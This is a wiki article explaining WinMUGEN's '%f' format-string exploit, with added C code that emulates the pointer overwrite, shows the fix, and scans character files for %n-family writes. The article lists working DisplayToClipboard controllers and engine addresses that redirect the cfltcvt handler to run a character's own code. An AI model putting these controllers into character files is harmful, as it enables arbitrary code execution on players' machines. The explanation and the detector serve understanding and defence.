MUGEN Cheap Wiki

The %f exploit, technically known as M.U.G.E.N sprintf Float Format Handler Call Redirection, is an exploit in WinMUGEN that allows a character to execute arbitrary code during matches.

It is considered the first exploit that allowed arbitrary code execution: authors could redirect sprintf's float handler, cfltcvt, to their own code simply by overwriting its pointer with the address of theirs, letting their character defeat the opponent effortlessly.

Exploit Details

Developers can choose to statically link specific libraries into their program to make it more portable and self-contained, and that is the choice the Elecbyte team made when compiling this engine build. By itself this is not a problem, but because the %n format-string bug is present in the engine's code, it can lead to arbitrary code execution: the statically linked runtime's internal function pointers sit at fixed addresses inside the executable, where a format-string write can reach them.

One of the functions MUGEN uses to process text strings, sprintf, calls several helper functions through pointers that can be redirected to execute code. When it processes an input string containing a float format specifier (%f, %g, %e), it calls a handler, cfltcvt, through a pointer that can be tampered with so that a character's shellcode runs instead. Most characters trigger the handler with a DisplayToClipboard state controller whose text contains such a specifier, but the engine also formats the FPS value for the debug clipboard at the end of every frame, so the redirected handler runs then as well; unless the shellcode is written with this in mind, matches will display abnormal behavior.

An example of several DisplayToClipboard state controllers used to modify cfltcvt's pointer (located at 0x004B48E8) for code redirection:

[State Sample_Code (INT3)]
Type     = DisplayToClipboard
Trigger1 = 1
Text     = "%204u%hn"
Params   = 1, 4925504

[State Redirection]
Type     = DisplayToClipboard
Trigger1 = 1
Text     = "%64u%hn"
Params   = 1, 4933864

[State Redirection]
Type     = DisplayToClipboard
Trigger1 = 1
Text     = "%40u%n"
Params   = 1, 4933865

[State Redirection]
Type     = DisplayToClipboard
Trigger1 = 1
Text     = "%75u%hn"
Params   = 1, 4933866

[State Active Float Handler Call]
Type     = DisplayToClipboard
Trigger1 = 1
Text     = "%f"
Params   = Pos X
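How the listing above works, as an added example that is not part of the article and not WinMUGEN code: the %n family stores the number of bytes printed so far through a pointer argument, so a field width chosen in the Text value becomes the value written, and three overlapping writes assemble one pointer. The addresses and widths are the ones in the listing; the local variables and the byte array standing in for engine memory are constructed for the example. The second function shows the pattern that defeats the whole class: pass text as a %s argument, never as the format.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Added example, not WinMUGEN code. Models the mechanism the article describes
 * with ordinary local memory; nothing here touches the engine. */

/* 1. A %hn conversion stores the number of bytes printed so far: "%204u%hn"
 *    prints a 204-character field and then writes 204 (0xCC) into the short
 *    the pointer argument refers to. The field width is the value. */
unsigned hn_stores_field_width(void)
{
    char out[256];
    short target = 0;                 /* stands in for a pointer slot */
    snprintf(out, sizeof out, "%204u%hn", 1u, &target);
    return (unsigned)target;          /* 204 */
}

/* 2. The fix: character text is an argument, never the format. The same text
 *    is copied literally and there is no pointer to write through. */
int hardened_copy_is_inert(void)
{
    char out[256];
    short target = 0x7777;                       /* must stay untouched */
    const char *clipboard_text = "%204u%hn";     /* constructed input */
    snprintf(out, sizeof out, "%s", clipboard_text);
    return strcmp(out, clipboard_text) == 0 && target == 0x7777;
}

/* 3. The three "Redirection" controllers. Each write is emulated: printf
 *    computes the count a "%<width>u" field produces, then 2 (%hn) or 4 (%n)
 *    bytes of that count are stored little-endian at the target, which is
 *    what the real conversion does on x86. */
#define SLOT_BASE 0x004B48E8u   /* cfltcvt pointer address, from the article */

static void emulate_count_write(uint8_t *mem, uint32_t addr, int width, int size)
{
    int count = snprintf(NULL, 0, "%*u", width, 1u);   /* what %n would store */
    for (int i = 0; i < size; i++)
        mem[addr - SLOT_BASE + i] = (uint8_t)(count >> (8 * i));
}

/* Returns the 32-bit value left in the cfltcvt slot after the three writes. */
uint32_t reconstructed_cfltcvt_pointer(void)
{
    uint8_t mem[8] = {0};                      /* 0x4B48E8..0x4B48EF, constructed */
    emulate_count_write(mem, 4933864u, 64, 2); /* "%64u%hn" at 0x4B48E8: 0x40 */
    emulate_count_write(mem, 4933865u, 40, 4); /* "%40u%n"  at 0x4B48E9: 0x28 00 00 00 */
    emulate_count_write(mem, 4933866u, 75, 2); /* "%75u%hn" at 0x4B48EA: 0x4B 00 */
    return (uint32_t)mem[0] | (uint32_t)mem[1] << 8
         | (uint32_t)mem[2] << 16 | (uint32_t)mem[3] << 24;
}

int main(void)
{
    printf("%%hn wrote %u (0x%02X)\n", hn_stores_field_width(), hn_stores_field_width());
    printf("hardened copy inert: %d\n", hardened_copy_is_inert());
    printf("slot now 0x%08X (= %u)\n",
           reconstructed_cfltcvt_pointer(), reconstructed_cfltcvt_pointer());
    return 0;
}
```

The slot ends up holding 0x004B2840, which is 4925504, the Params address the Sample_Code controller writes its 0xCC byte to; that is how the listing ties together. Note that the controllers need nothing beyond field widths and pointer arguments, which is why the only reliable fix is at the sprintf call site, not in the content.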

Other, similar methods to execute code work by tampering with the pointers of sprintf's other float-related helpers: redirecting cropzeros (located at 0x004B48EC) executes code only when %g or %e is used, and redirecting forcdecpt (located at 0x004B48F4) executes code only when the # flag is specified within any of these format specifiers.
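Every variant above depends on the same ingredient: a %n-family conversion in a Text value, which has no legitimate use in clipboard text. A check for that, as an added example (not part of the article or of any MUGEN tool): it walks each conversion specification properly, so flags, widths, precisions and length modifiers (%hn, %ln, %.*n) do not hide the write, and it tolerates Type and Text in either order within a section. The sample .cns content is constructed from the listing above plus a few harmless controllers.

```c
#include <string.h>
#include <ctype.h>

/* Added example, not part of the article or of any MUGEN tool. Defender-side
 * check for %n-family conversions in clipboard controller text. */

/* Returns 1 if fmt contains a conversion that stores a byte count through a
 * pointer argument: %n with any flags, width, precision or length modifier. */
int text_has_count_write(const char *fmt)
{
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                             /* literal "%%" */
        while (*p && strchr("-+ #0", *p)) p++;               /* flags */
        while (*p && (isdigit((unsigned char)*p) || *p == '*')) p++;   /* width */
        if (*p == '.') {                                     /* precision */
            p++;
            while (*p && (isdigit((unsigned char)*p) || *p == '*')) p++;
        }
        while (*p && strchr("hlLqjzt", *p)) p++;             /* length modifier */
        if (*p == 'n') return 1;
        if (!*p) break;
    }
    return 0;
}

static int ieq(const char *a, const char *b)      /* case-insensitive equality */
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return 0;
    return *a == *b;
}

static char *trim(char *s)
{
    while (isspace((unsigned char)*s)) s++;
    char *end = s + strlen(s);
    while (end > s && isspace((unsigned char)end[-1])) *--end = '\0';
    return s;
}

/* Walks .cns/.st text line by line ("[...]" opens a section, ';' starts a
 * comment, "key = value" otherwise) and returns how many DisplayToClipboard or
 * AppendToClipboard sections carry a count-writing Text value. Type and Text
 * may appear in either order within a section. */
int count_suspicious_clipboard_texts(const char *cns)
{
    int hits = 0, is_clipboard = 0, text_hit = 0;
    const char *line = cns;
    while (*line) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        char buf[256];
        if (len >= sizeof buf) len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';
        line = eol ? eol + 1 : line + strlen(line);

        char *semi = strchr(buf, ';');
        if (semi) *semi = '\0';
        char *s = trim(buf);
        if (*s == '[') {                   /* new section: settle the previous one */
            hits += (is_clipboard && text_hit);
            is_clipboard = text_hit = 0;
            continue;
        }
        char *eq = strchr(s, '=');
        if (!eq) continue;
        *eq = '\0';
        char *key = trim(s), *val = trim(eq + 1);
        if (ieq(key, "type"))
            is_clipboard = ieq(val, "DisplayToClipboard") || ieq(val, "AppendToClipboard");
        else if (ieq(key, "text") && text_has_count_write(val))
            text_hit = 1;
    }
    return hits + (is_clipboard && text_hit);   /* settle the last section */
}

/* Constructed sample: two writing controllers from the article's listing (one
 * with Text before Type), a "%n" one, and harmless controllers that only print. */
const char *SAMPLE_CNS =
    "[State Sample_Code (INT3)]\n"
    "Type     = DisplayToClipboard\n"
    "Trigger1 = 1\n"
    "Text     = \"%204u%hn\"\n"
    "Params   = 1, 4925504\n"
    "[State Redirection]\n"
    "Text     = \"%64u%hn\"      ; Text before Type\n"
    "Type     = DisplayToClipboard\n"
    "[State Redirection]\n"
    "Type     = DisplayToClipboard\n"
    "Text     = \"%40u%n\"\n"
    "[State Active Float Handler Call]\n"
    "Type     = DisplayToClipboard\n"
    "Text     = \"%f\"\n"
    "Params   = Pos X\n"
    "[State Benign]\n"
    "Type     = DisplayToClipboard\n"
    "Text     = \"life %d, power 100%%\"\n";

int scan_sample(void) { return count_suspicious_clipboard_texts(SAMPLE_CNS); }   /* 3 */
```

The scanner flags three of the five sections in the sample; the "%f" controller and the benign "%d" one pass, since they only print. The same check can be run over a character's .cns and .st files before it is added to a roster, or over the engine's own debug output when a match misbehaves in the way described above.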

1.0/1.1

As the main MSVCRT functions of M.U.G.E.N 1.0 and higher are dynamically linked, this exploit is limited to WinMUGEN.
